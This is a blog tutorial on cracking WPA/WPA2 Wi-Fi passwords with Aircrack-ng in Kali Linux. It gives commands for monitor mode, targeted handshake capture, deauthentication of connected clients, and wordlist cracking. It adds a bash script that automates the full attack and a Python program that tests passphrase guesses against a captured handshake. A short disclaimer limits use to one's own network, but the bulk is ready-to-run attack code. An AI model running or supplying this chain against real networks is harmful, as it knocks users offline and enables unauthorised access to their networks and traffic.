©2019 Security Unleashed | New Delhi

  • Animesh Gupta

How To Crack WPA/WPA2 Wi-Fi Passwords Using Aircrack-Ng In Kali

Updated: Jul 8, 2018

Introduction (The Ultimate Guide To Cracking WPA/WPA2 Wireless Networks)

This article teaches you how to crack WPA/WPA2 Wi-Fi passwords using the Aircrack-ng suite in Kali Linux.

Before we begin, you’ll require the following:

  • Kali Linux (could be live CD, installed OS, or virtual machine).

  • A WiFi adapter that is capable of injecting packets and entering “monitor” mode. Unless you are lucky enough to have a computer whose built-in network card has this capability, you’ll probably need to purchase an external WiFi adapter.

  • Multiple diverse wordlists to attempt to crack the WPA handshake password once it has been captured by airodump-ng.

  • Having computing power, resources, and money isn’t enough. Time, dedication, consistency, and patience are required to succeed.

NOTE: This tutorial is for educational purposes only. You acknowledge that you are using your newly acquired knowledge to perform penetration testing on your own test network environment and router device.

This article is split into four sections in which I strive to explain, as simply as possible, the following:

  • How to easily hack a Wi-Fi network’s WPA/WPA2 handshake password, so that you learn quickly and retain this information for the future.

  • Effective troubleshooting solutions for the issues and bugs surrounding external WiFi adapters, and the common problems that prevent you from cracking a WiFi password.

  • The best tips for obtaining a WiFi password with the Aircrack-ng suite, which will lead to higher success rates. Alongside, I will illustrate the differences between the pros and the amateurs, which ultimately serves the first objective of this article.

  • Lastly, download links to many different wordlists that I recommend for cracking WEP/WPA/WPA2.

Let’s start!

How to Easily Hack A Wi-Fi Network’s WPA/WPA2 Handshake Password

Penetration Of A Wireless Network Starts With Logging Into Kali

If you haven’t already logged in to Kali, the default login information is: root (username) and toor (password). This applies to Kali releases before 2020.1; from 2020.1 onwards the default account is kali / kali, and the aircrack-ng commands below then need sudo.

Plug In A Compatible Packet Injection WiFi Card Into Your Computer’s USB Port

Plug the external WiFi adapter into your computer’s USB port. If your computer already has a built-in WiFi card that supports monitor mode, skip this. If you are using virtualization software, you need to pass the USB device through to the guest: there is an icon to click on to select the device, and in VirtualBox make sure to add a USB device filter for the adapter so it attaches to the VM.

Recommended USB Wi-Fi Plug-And-Play Cards For Kali Linux

Here is my list of the top three recommended USB plug-and-play Wi-Fi cards for Kali Linux:

TP-Link WN722 (2.4GHz, first version only)

Alfa AWUS036NHA (2.4GHz)

Alfa AWUS036H (2.4GHz)

Plug-and-play here means that the driver for the card is already included in the Kali kernel, so no extra driver installation is required to get the external Wi-Fi card working. Just plug the external card into a USB port and enjoy.

Package Description:

Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program. For WEP it can recover the key once enough data packets have been captured: it implements the standard FMS attack along with optimizations such as the KoreK attacks and the PTW attack, which makes it much faster than other WEP cracking tools.

For WPA/WPA2-PSK there is no such statistical shortcut. Aircrack-ng needs a captured four-way handshake and then tests passphrase guesses from a wordlist against it offline, so the attack succeeds only if the passphrase is in the wordlist.

Here are the basic steps we will be going through:

  • Install the latest aircrack-ng

  • Start the wireless interface in monitor mode using airmon-ng

  • Start airodump-ng on the AP’s channel with a BSSID filter to collect the authentication handshake

  • [Optional] Use aireplay-ng to deauthenticate a wireless client so it reconnects

  • Run aircrack-ng to crack the WPA/WPA2-PSK using the captured handshake

Open A Terminal In Kali

In the terminal, type in: airmon-ng

This lists the wireless cards that support monitor mode (it does not test packet injection). If no cards are listed, try disconnecting and reconnecting the adapter (if you’re using one) and check that it supports monitor mode.

You can see here that my card supports monitor mode and that it’s listed as wlan0.

Type airmon-ng start followed by the interface name of your wireless card.

airmon-ng start wlan0

The “(monitor mode enabled)” message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface: mon0 with the aircrack-ng version used here. Recent versions of airmon-ng instead rename the card to wlan0mon, so substitute that name in the commands below if that is what you see.

ifconfig [interface of wireless card] down

Replace [interface of wireless card] with the name of the original interface you started monitor mode on, probably wlan0.

This takes the managed interface down so the card no longer tries to connect to the internet and can be used purely in monitor mode.

After you are done with monitor mode (once the wireless section of this tutorial is complete), stop the monitor interface with airmon-ng stop mon0 and bring the original interface back up by typing ifconfig [interface of wireless card] up and pressing Enter.

Type airodump-ng followed by the name of the new monitor interface, which is probably mon0.

If airodump-ng (or aireplay-ng later) complains about “fixed channel -1”, another process, typically NetworkManager or wpa_supplicant, is still managing the card and keeps changing its channel. Run airmon-ng check kill to stop those processes, then start monitor mode again with airmon-ng start wlan0 and retry.

Airodump will now list all of the wireless networks in your area, and a lot of useful information about them.

Locate your network or the network that you have permission to penetration test.

Once you’ve spotted your network on the growing list, hit Ctrl + C on your keyboard to stop the process. Note the channel (CH column) of your target network.

Copy the BSSID (the access point’s MAC address) of the target network.

Now type this command:

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface (mon0). Note that --bssid takes two hyphens.

The “-w” option and the path that follows it set a file name prefix for the capture files; this is where airodump-ng will save any intercepted four-way handshake (necessary to crack the password). Here we saved it to the Desktop, but you can save it anywhere. Because the prefix ends in a slash, the files are named -01.cap, -01.csv and so on inside that directory.

A complete command should look similar to this:

airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

Now press enter.

Airodump will now monitor only the target network, allowing us to capture more specific information about it.

What we’re really doing now is waiting for a device to connect or reconnect to the network. When it does, the client and the access point perform the four-way handshake, and that exchange is what we need to capture in order to crack the password.

Also, several files (a .cap capture plus .csv and Kismet-format listings) should show up on your desktop. The .cap file is where the handshake will be saved when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do.

We’re actually going to use another cool-tool that belongs to the aircrack suitecalled aireplay-ng, to speed up the process.

Instead of waiting for a device to connect, hackers can use this tool to force a device to reconnect by sending deauthentication (deauth) frames to one of the network’s devices, spoofed so they appear to come from the access point, making the client think it has to reconnect to the network.

In order for this tool to work, there has to be a client connected to the network first, so watch the STATION section of the airodump-ng output and wait for a client to show up. It might take a long time, or it might take only a second before the first one shows.

If none show up after a lengthy wait, then the network might be empty right now, or you’re too far away from the network.

Next step:

Leave airodump-ng running and open a second terminal. In this terminal, type this command:

aireplay-ng -0 2 -a [router bssid] -c [client mac] mon0

  • -0 is a shortcut for the deauthentication attack mode

  • 2 is the number of deauth rounds to send (0 would send them continuously)

  • -a indicates the access point/router’s BSSID

  • -c indicates the client’s MAC address (its STATION entry in airodump-ng); if you omit it, the deauth is broadcast to every client of that access point

  • mon0 merely means the monitor interface

My complete command looks like this:

aireplay-ng -0 2 -a 00:14:BF:E0:E8:D5 -c 4C:EB:42:59:DE:31 mon0

Upon hitting Enter, you’ll see aireplay-ng send the packets.

If you were close enough to the target client, and the deauthentication process works, a “WPA handshake: 00:14:BF:E0:E8:D5” message (with your target’s BSSID) will appear in the top-right corner of the airodump screen (which you left open).

This means that the handshake has been captured. The password itself is not in the capture, but the handshake contains everything needed to test passphrase guesses against it offline, so in that sense the password is now in the hacker’s hands.

You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don't close this window in case you need some of the information later.

Open a new Terminal, and type in this command:

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

  • -a selects the attack mode aircrack will use: 2 is WPA/WPA2-PSK (1 would be WEP).

  • -b stands for bssid; replace [router bssid] with the BSSID of the target router.

  • -w stands for wordlist, a text file with one candidate passphrase per line.

  • /root/Desktop/*.cap is the path to the .cap file containing the captured handshake.

My complete command looks like this:

aircrack-ng -a2 -b 00:14:BF:E0:E8:D5 -w /root/wpa.txt /root/Desktop/*.cap

Aircrack-ng will now launch into the process of cracking the password. It will crack it if the password happens to be in the wordlist that you’ve selected. Sometimes it’s not.

If this is the case, you can try other wordlists.

If you simply cannot find the password no matter how many wordlists you try, then it appears your penetration test has failed, and the network is at least safe from basic dictionary attacks.
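The whole procedure above (monitor mode, targeted capture, deauthentication, cracking) as one script. This is an added example, not code from the original article or from the Aircrack-ng project. It assumes a Kali box with aircrack-ng and iw installed and a card that supports monitor mode; the interface, channel, BSSID, client MAC and wordlist path are hypothetical arguments, validated before the script touches the card. Setting DRY_RUN=1 prints the commands instead of running them.

```shell
#!/usr/bin/env bash
# Added example (not from the original article or the Aircrack-ng project):
# the monitor-mode / capture / deauth / crack steps above as one script with
# input validation. Assumes Kali with aircrack-ng and iw installed and a card
# that supports monitor mode. All five arguments are hypothetical inputs.
# DRY_RUN=1 prints the commands instead of running them.
set -u

# Print (dry run) or execute a command.
run_cmd() {
    if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Accept only a well-formed MAC (the BSSID or a STATION entry from airodump-ng).
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Channels 1-14 on 2.4 GHz, up to 165 on 5 GHz.
valid_channel() {
    printf '%s\n' "$1" | grep -Eq '^[0-9]+$' && [ "$1" -ge 1 ] && [ "$1" -le 165 ]
}

# airmon-ng 1.2 and later rename the card to wlan0mon; old builds create mon0.
# Either way the monitor interface is the one whose name contains "mon".
monitor_iface() {
    if [ "${DRY_RUN:-0}" = 1 ]; then printf '%smon\n' "$1"; return 0; fi
    iw dev 2>/dev/null | awk '/Interface/ && /mon/ { print $2; exit }'
}

# usage: run_capture <iface> <channel> <ap bssid> <client mac> <wordlist>
run_capture() {
    local iface="$1" channel="$2" bssid="$3" client="$4" wordlist="$5"
    local prefix="${CAPTURE_PREFIX:-/root/Desktop/capture}" mon dump_pid=""
    valid_mac "$bssid"       || { echo "bad BSSID: $bssid" >&2; return 2; }
    valid_mac "$client"      || { echo "bad client MAC: $client" >&2; return 2; }
    valid_channel "$channel" || { echo "bad channel: $channel" >&2; return 2; }
    [ -r "$wordlist" ]       || { echo "unreadable wordlist: $wordlist" >&2; return 2; }

    # Processes still managing the card (NetworkManager, wpa_supplicant) are
    # the usual cause of the "fixed channel -1" error, so stop them first.
    run_cmd airmon-ng check kill
    run_cmd airmon-ng start "$iface"
    mon=$(monitor_iface "$iface")
    [ -n "$mon" ] || { echo "no monitor interface found after airmon-ng start" >&2; return 3; }

    # Capture only the target BSSID on its channel. -w is a file name prefix,
    # so the capture lands in ${prefix}-01.cap. Runs in the background.
    set -- airodump-ng -c "$channel" --bssid "$bssid" -w "$prefix" "$mon"
    if [ "${DRY_RUN:-0}" = 1 ]; then run_cmd "$@"
    else "$@" >/dev/null 2>&1 & dump_pid=$!; fi
    sleep "${SETTLE:-5}"

    # Two rounds of deauth frames to the client force it to reconnect, which
    # makes it redo the 4-way handshake while airodump-ng is listening.
    run_cmd aireplay-ng -0 2 -a "$bssid" -c "$client" "$mon"
    sleep "${SETTLE:-5}"
    if [ -n "$dump_pid" ]; then kill "$dump_pid" 2>/dev/null || true; wait "$dump_pid" 2>/dev/null || true; fi

    # Offline dictionary attack on the captured handshake (-a 2 = WPA-PSK).
    run_cmd aircrack-ng -a 2 -b "$bssid" -w "$wordlist" "$prefix"-*.cap
}

# Only run when invoked with all five arguments, e.g.
#   ./wpa-capture.sh wlan0 10 00:14:BF:E0:E8:D5 4C:EB:42:59:DE:31 /root/wpa.txt
if [ "$#" -eq 5 ]; then run_capture "$@"; fi
```

Run it as root on a network you are authorized to test. The fixed waits are a simplification: in practice confirm the “WPA handshake:” line in the airodump-ng output before cracking, and send the deauth again if no handshake appeared.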

If the phrase is in the wordlist, then aircrack-ng will show it to you like this:

The passphrase to our test-network was “notsecure,” and you can see here that it was in the wordlist, and aircrack found it.
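What aircrack-ng actually does with the captured handshake, and why the capture puts the password “in the hacker’s hands” even though the password is never transmitted: each guess is run through PBKDF2 with the SSID, expanded into the key confirmation key with both MACs and both nonces, and used to recompute the MIC on the client’s EAPOL message; a matching MIC means the guess is the passphrase. The following is an added example written for this article, not code from the original page or from the Aircrack-ng project. It uses only the Python standard library. The SSID "test-network", the nonces and the EAPOL-Key frame are constructed for the example; the BSSID, client MAC and the passphrase "notsecure" are the ones from the walkthrough above.

```python
"""Offline WPA/WPA2-PSK dictionary check against a captured 4-way handshake.

Added example, not code from the original article or the Aircrack-ng project.
It shows what the handshake hands the attacker (ANonce, SNonce, both MACs and
a MIC keyed by the passphrase) and the check aircrack-ng -a2 runs per guess.
Standard library only. The SSID "test-network", the nonces and the EAPOL-Key
frame below are constructed; the MACs and "notsecure" come from the article.
"""
import hashlib
import hmac

NONCE_OFFSET = 17   # Key Nonce field inside an EAPOL-Key frame (32 bytes)
MIC_OFFSET = 81     # Key MIC field (16 bytes)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the slow step and is where nearly all cracking time goes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF: HMAC-SHA1(key, label | 0x00 | data | i) for i = 0..3."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))[:64]


def kck_from_pmk(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key = first 16 bytes of the PTK. Both MACs and both
    nonces go in, so the attacker needs message 1 (ANonce) and message 2
    (SNonce + MIC) of the handshake, not just a single frame."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL frame with its MIC field zeroed. The descriptor
    version (low 3 bits of Key Information) selects the algorithm:
    1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1 truncated to 128 bits (WPA2/CCMP)."""
    version = frame[6] & 0x07
    blank = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, blank, hashlib.md5).digest()
    return hmac.new(kck, blank, hashlib.sha1).digest()[:16]


def build_eapol_key_frame(nonce: bytes, key_info: int = 0x010A) -> bytes:
    """Constructed EAPOL-Key message 2 (RSN, version 2, pairwise, MIC bit set)."""
    body = (bytes([0x02])                      # descriptor type: RSN
            + key_info.to_bytes(2, "big")      # key information
            + (16).to_bytes(2, "big")          # key length
            + (1).to_bytes(8, "big")           # replay counter
            + nonce                            # SNonce in message 2
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
            + bytes(16)                        # MIC, filled in by the client
            + (0).to_bytes(2, "big"))          # key data length
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body


def capture_handshake(ssid, passphrase, ap, sta, anonce, snonce) -> dict:
    """Stand-in for the .cap file: what airodump-ng's 'WPA handshake' gives us.
    The client side computes the MIC with the real passphrase."""
    frame = build_eapol_key_frame(snonce)
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap, sta, anonce, snonce)
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap": ap, "sta": sta, "anonce": anonce, "eapol": frame}


def crack(hs: dict, wordlist):
    """Recompute the MIC for each candidate; a match is the passphrase.
    Nothing touches the network: the whole attack runs on the capture."""
    snonce = hs["eapol"][NONCE_OFFSET:NONCE_OFFSET + 32]
    target = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        cand = cand.strip()
        if not 8 <= len(cand) <= 63:        # WPA-PSK passphrases are 8..63 chars
            continue
        pmk = pmk_from_passphrase(cand, hs["ssid"])
        kck = kck_from_pmk(pmk, hs["ap"], hs["sta"], hs["anonce"], snonce)
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), target):
            return cand
    return None


AP = bytes.fromhex("0014BFE0E8D5")      # BSSID from the article
STA = bytes.fromhex("4CEB4259DE31")     # client MAC from the article
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))   # constructed nonces
HANDSHAKE = capture_handshake("test-network", "notsecure", AP, STA, ANONCE, SNONCE)
WORDLIST = ["password", "12345678", "short", "notsecure", "letmein1"]

if __name__ == "__main__":
    print(crack(HANDSHAKE, WORDLIST))   # notsecure
```

Two things follow from the code that the walkthrough only implies: the SSID is the PBKDF2 salt, so precomputed tables only help against common network names, and each guess costs 4096 HMAC-SHA1 rounds, which is why a long random passphrase is out of reach of a wordlist attack while a dictionary word falls in seconds.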

If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible.

Happy Hacking!